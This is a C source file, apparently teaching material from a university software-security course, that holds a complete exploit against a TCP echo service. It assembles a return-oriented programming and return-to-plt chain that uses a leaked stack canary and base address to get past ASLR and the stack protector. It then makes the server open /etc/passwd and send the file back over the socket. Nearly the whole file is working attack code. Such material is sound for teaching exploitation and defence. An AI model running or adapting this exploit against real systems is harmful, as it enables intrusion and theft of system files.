/*
 * TCP-based Echo Service exploit
 *  - Method: just-in-time ROP (JIT-ROP) & return-to-plt (ret2plt)
 *
 * Vasileios P. Kemerlis <vpk@cs.brown.edu>
 *  - CSCI 1650: Software Security and Exploitation
 *  - https://cs.brown.edu/courses/csci1650/
 */

#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define	ECHO_ADDR_DFL	"127.0.0.1"	/* default IPv4 server address	*/
#define ECHO_PORT_DFL	7777	/* default Echo Protocol port (TCP)	*/
#define	BUF_SZ		1024	/* buffer size				*/

/*
 * payload stuff
 * (return-to-plt; ret2plt & just-in-time return-oriented programming; JIT-ROP)
 *
 * JIT-ROP & ret2plt chaining & %esp lifting:
 *  - open("/etc/passwd") -> sendfile(file, socket, NULL, UINT_MAX) -> exit(0)
 *  - Bypasses ASLR and '-fstack-protector' via means of blind return-oriented
 *    programming; BROP
 */
#define	VULN_BUF_SZ	512
#define	OPEN_ADDR	0x00001110UL
#define	OPEN_A1		"\x00\x00\x00\x00"
#define	OPEN_A2		"\x00\x00\x00\x00"
#define	OPEN_A3		"\x00\x00\x00\x00"
#define	SENDFILE_ADDR	0x000010f0UL
#define	SENDFILE_A1	"\x04\x00\x00\x00"
#define	SENDFILE_A2	"\x05\x00\x00\x00"
#define	SENDFILE_A3	"\x00\x00\x00\x00"
#define	SENDFILE_A4	"\xff\xff\xff\xff"
#define	EXIT_ADDR	0x00001100UL
#define	EXIT_A1		"\x00\x00\x00\x00"
#define	ESP_LIFT1_ADDR	0x0000130aUL
#define	ESP_LIFT2_ADDR	0x00001333UL

#define	RET_ADDR1_OFF	(VULN_BUF_SZ + 16)
#define	RET_ADDR2_OFF	(RET_ADDR1_OFF + 4)
#define	RET_ADDR3_OFF	(RET_ADDR2_OFF + 4)
#define	RET_ADDR4_OFF	(RET_ADDR3_OFF + 4)
#define	RET_ADDR5_OFF	(RET_ADDR4_OFF + 4)
#define	RET_ADDR6_OFF	(RET_ADDR5_OFF + 4)
#define	RET_ADDR7_OFF	(RET_ADDR6_OFF + 4)
#define	RET_ADDR8_OFF	(RET_ADDR7_OFF + 4)
#define	RET_ADDR9_OFF	(RET_ADDR8_OFF + 4)
#define	RET_ADDRA_OFF	(RET_ADDR9_OFF + 16)
#define	RET_ADDRB_OFF	(RET_ADDRA_OFF + 4)
#define	RET_ADDRC_OFF	(RET_ADDRB_OFF + 32)

#define CANARY_OFF	(RET_ADDR1_OFF - 16)

#define	OPEN_A1_OFF	(RET_ADDR9_OFF + 4)
#define	OPEN_A2_OFF	(OPEN_A1_OFF + 4)
#define	OPEN_A3_OFF	(OPEN_A2_OFF + 4)
#define	SENDFILE_A1_OFF	(RET_ADDRB_OFF + 4)
#define	SENDFILE_A2_OFF	(SENDFILE_A1_OFF + 4)
#define	SENDFILE_A3_OFF	(SENDFILE_A2_OFF + 4)
#define	SENDFILE_A4_OFF	(SENDFILE_A3_OFF + 4)
#define	EXIT_A1_OFF	(RET_ADDRC_OFF + 8)
#define PATHNAME_OFF	(EXIT_A1_OFF + 8)
#define PATHNAME	"/etc/passwd"
#define G1_ADDR		0x00001306UL	/* &'push %esp; pop %edx; ret'	*/
#define G2_ADDR		0x00001323UL	/* &'add $0x20, edx; ret'	*/
#define G3_ADDR		0x00001301UL	/* &'push %edx; pop %ebx; ret'	*/
#define G4_ADDR		0x0000131eUL	/* &'add $0x40, %edx; ret'	*/
#define G5_ADDR		0x00001318UL	/* &'mov edx, (%ebx); ret'	*/
#define G6_ADDR		0x0000101eUL	/* &'pop %ebx; ret'		*/

#define	PLT_FIX		0x00003ff4UL

/* cleanup routine */
static void
cleanup(int srv_fd)
{
	/* socket cleanup			*/
	if (srv_fd != -1)
		close(srv_fd);
}

/* server handler */
static void
srv_hndl(int sfd, unsigned long scanary, unsigned long baddr)
{
	/* payload buffer			*/
	char		buf[BUF_SZ];

	/* length pointer			*/
	ssize_t		len;

	/* ASLR address (gadget, routine, etc.) */
	unsigned long	addr_aslr;

	/* verbose				*/
	fprintf(stdout, "[+] Bypassing ASLR... ");

	/* verbose				*/
	fprintf(stdout, "[SUCCESS]\n"); fflush(stdout);
	fprintf(stdout, "    [*] Base address = %#08lx\n", baddr);

	/* verbose				*/
	fprintf(stdout, "[+] Bypassing Stack Protector... ");

	fprintf(stdout, "[SUCCESS]\n"); fflush(stdout);
	fprintf(stdout, "    [*] Stack canary = %#08lx\n", scanary);
	fprintf(stdout, "[+] Preparing the payload... ");

	/* cleanup				*/
	memset(buf, 'X', BUF_SZ);

	/* prepare the payload 			*/
	memcpy(buf + CANARY_OFF, &scanary, sizeof(scanary));
				addr_aslr = baddr + G1_ADDR;
	memcpy(buf + RET_ADDR1_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + G2_ADDR;
	memcpy(buf + RET_ADDR2_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + G3_ADDR;
	memcpy(buf + RET_ADDR3_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + G4_ADDR;
	memcpy(buf + RET_ADDR4_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + G5_ADDR;
	memcpy(buf + RET_ADDR5_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + G6_ADDR;
	memcpy(buf + RET_ADDR6_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + PLT_FIX;
	memcpy(buf + RET_ADDR7_OFF, &addr_aslr, sizeof(addr_aslr));

				addr_aslr = baddr + OPEN_ADDR;
	memcpy(buf + RET_ADDR8_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + ESP_LIFT1_ADDR;
	memcpy(buf + RET_ADDR9_OFF, &addr_aslr, sizeof(addr_aslr));
	memcpy(buf + OPEN_A1_OFF, OPEN_A1, sizeof(OPEN_A1) - 1);
	memcpy(buf + OPEN_A2_OFF, OPEN_A2, sizeof(OPEN_A2) - 1);
	memcpy(buf + OPEN_A3_OFF, OPEN_A3, sizeof(OPEN_A3) - 1);
				addr_aslr = baddr + SENDFILE_ADDR;
	memcpy(buf + RET_ADDRA_OFF, &addr_aslr, sizeof(addr_aslr));
				addr_aslr = baddr + ESP_LIFT2_ADDR;
	memcpy(buf + RET_ADDRB_OFF, &addr_aslr, sizeof(addr_aslr));
	memcpy(buf + SENDFILE_A1_OFF, SENDFILE_A1, sizeof(SENDFILE_A1) - 1);
	memcpy(buf + SENDFILE_A2_OFF, SENDFILE_A2, sizeof(SENDFILE_A2) - 1);
	memcpy(buf + SENDFILE_A3_OFF, SENDFILE_A3, sizeof(SENDFILE_A3) - 1);
	memcpy(buf + SENDFILE_A4_OFF, SENDFILE_A4, sizeof(SENDFILE_A4) - 1);
				addr_aslr = baddr + EXIT_ADDR;
	memcpy(buf + RET_ADDRC_OFF, &addr_aslr, sizeof(addr_aslr));
	memcpy(buf + EXIT_A1_OFF, EXIT_A1, sizeof(EXIT_A1) - 1);
	memcpy(buf + PATHNAME_OFF, PATHNAME, strlen(PATHNAME) + 1);

	/* verbose				*/
	fprintf(stdout, "[SUCCESS]\n"); fflush(stdout);
	fprintf(stdout, "[+] Triggering the exploit... ");

	/* trigger the vulnerability		*/
	write(sfd, buf, PATHNAME_OFF + strlen(PATHNAME) + 1);

	/* verbose				*/
	fprintf(stdout, "[w00t!]\n"); fflush(stdout);

	/* dump the result to stderr(3)		*/
	while ((len = read(sfd, buf, BUF_SZ)) > 0)
		write(STDERR_FILENO, buf, len);
}

int
main(int argc, char **argv)
{
	/* socket descriptor; server		*/
	int	sfd = -1;

	/* IPv4 address; server			*/
	struct	sockaddr_in
		sin = {
			.sin_family	= AF_INET,
			.sin_port	=
				((argc > 2 && argv[2]) ?
				htons((in_port_t)strtoul(argv[2], NULL, 10)) :
				htons(ECHO_PORT_DFL)),
			.sin_addr	=
				{ ((argc > 1 && argv[1]) ?
				inet_addr(argv[1]) :
				inet_addr(ECHO_ADDR_DFL)) },
		};

	/* verbose				*/
	fprintf(stdout, "[+] Creating socket... ");

	/* get the connecting socket		*/
	if ((sfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
		/* failed			*/
		fprintf(stdout, "[FAILURE]\n"); fflush(stdout);
		perror("[-] socket(2) failed");
		goto err;
	}

	/* verbose				*/
	fprintf(stdout, "[SUCCESS]\n"); fflush(stdout);
	fprintf(stdout, "[+] Connecting to %s:%hu... ",
			inet_ntoa(sin.sin_addr),
			ntohs(sin.sin_port));

	/* connect to server			*/
	if (connect(sfd,
		(const struct sockaddr *)&sin,
		sizeof(struct sockaddr_in)) == -1) {
		/* failed			*/
		fprintf(stdout, "[FAILURE]\n"); fflush(stdout);
		perror("[-] connect(2) failed");
		goto err;
	}

	/* verbose				*/
	fprintf(stdout, "[SUCCESS]\n"); fflush(stdout);

	/* handle the server			*/
	srv_hndl(sfd,
		((argc > 3 && argv[3]) ?
		(unsigned long)strtoul(argv[3], NULL, 16) :
		ULONG_MAX),
		((argc > 4 && argv[4]) ?
		(unsigned long)strtoul(argv[4], NULL, 16) :
		ULONG_MAX));

	/* cleanup				*/
	cleanup(sfd);

	/* done; success			*/
	return EXIT_SUCCESS;

	/* error handling			*/
err:
	/* cleanup				*/
	cleanup(sfd);

	/* done; error 				*/
	return EXIT_FAILURE;
}
